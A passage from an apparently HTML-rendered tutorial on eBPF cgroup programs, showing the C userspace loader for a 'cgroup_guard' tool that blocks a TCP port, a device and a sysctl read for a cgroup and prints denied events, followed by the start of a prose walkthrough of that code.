    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;dev_major&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dev_minor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;deny_sysctl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse command line arguments */&lt;/span&gt;
    &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;option&lt;/span&gt; &lt;span class="n"&gt;long_opts&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"cgroup"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;      &lt;span class="n"&gt;required_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'c'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"block-port"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="n"&gt;required_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'p'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"deny-device"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;required_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'d'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"deny-sysctl"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;required_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'s'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"help"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="n"&gt;no_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'h'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{}&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;opt&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;opt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;getopt_long&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"c:p:d:s:h"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;long_opts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;switch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;opt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="sc"&gt;'c'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;cgroup_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;optarg&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="sc"&gt;'p'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;block_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;atoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;optarg&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
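        &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="sc"&gt;'d'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="cm"&gt;/* parse major:minor, e.g. "1:3" */&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sscanf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;optarg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%d:%d"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dev_major&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dev_minor&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;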
        &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="sc"&gt;'s'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;deny_sysctl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;optarg&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nl"&gt;default:&lt;/span&gt; &lt;span class="n"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;libbpf_set_print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGINT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGTERM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Create cgroup directory if needed */&lt;/span&gt;
    &lt;span class="n"&gt;mkdir&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cgroup_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;0755&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;cg_fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cgroup_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;O_RDONLY&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;O_DIRECTORY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cg_fd&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"open(%s) failed: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cgroup_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;strerror&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;errno&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Open and configure BPF skeleton */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;cgroup_guard_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cgroup_guard_bpf__open&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"cgroup_guard_bpf__open() failed&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Write .rodata configuration (must be before load) */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;block_port&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;block_port&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;65535&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;rodata&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_tcp_dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;block_port&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dev_major&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;dev_minor&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;rodata&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_dev_major&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;dev_major&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;rodata&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_dev_minor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;dev_minor&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;deny_sysctl&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;snprintf&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;rodata&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;denied_sysctl_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                 &lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;deny_sysctl&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Declare the links before any goto so cleanup never sees uninitialized pointers */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link_connect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link_dev&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link_sysctl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Load BPF programs into kernel */&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cgroup_guard_bpf__load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"cgroup_guard_bpf__load() failed: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach programs to cgroup */&lt;/span&gt;
    &lt;span class="n"&gt;link_connect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_cgroup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cg_connect4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;link_dev&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_cgroup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cg_dev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;link_sysctl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_cgroup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cg_sysctl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Setup ring buffer for events */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ring_buffer&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ring_buffer__new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_map__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                              &lt;span class="n"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Attached to cgroup: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cgroup_path&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Config: block_port=%d, deny_device=%d:%d, deny_sysctl_read=%s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
           &lt;span class="n"&gt;block_port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dev_major&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dev_minor&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;deny_sysctl&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;deny_sysctl&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"(none)"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Main event loop */&lt;/span&gt;
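    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ring_buffer__poll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt; &lt;span class="cm"&gt;/* ms */&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;EINTR&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* interrupted by a signal: normal shutdown */&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* a positive value is the number of records consumed */&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;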

    &lt;span class="n"&gt;ring_buffer__free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link_sysctl&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link_dev&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link_connect&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;cgroup_guard_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Understanding the Userspace Code
&lt;/h4&gt;

&lt;p&gt;The userspace loader's core job is to attach BPF programs to the specified cgroup, then continuously poll the ringbuf to print denied events.&lt;/p&gt;

&lt;p&gt;The program first uses &lt;code&gt;getopt_long&lt;/code&gt; to parse command-line arguments, getting the cgroup path and three policy configurations. Then it uses &lt;code&gt;open()&lt;/code&gt; with &lt;code&gt;O_RDONLY | O_DIRECTORY&lt;/code&gt; to open the cgroup directory and get a file descriptor. This fd is the attach target—cgroup eBPF programs are attached to cgroup directories.&lt;/p&gt;

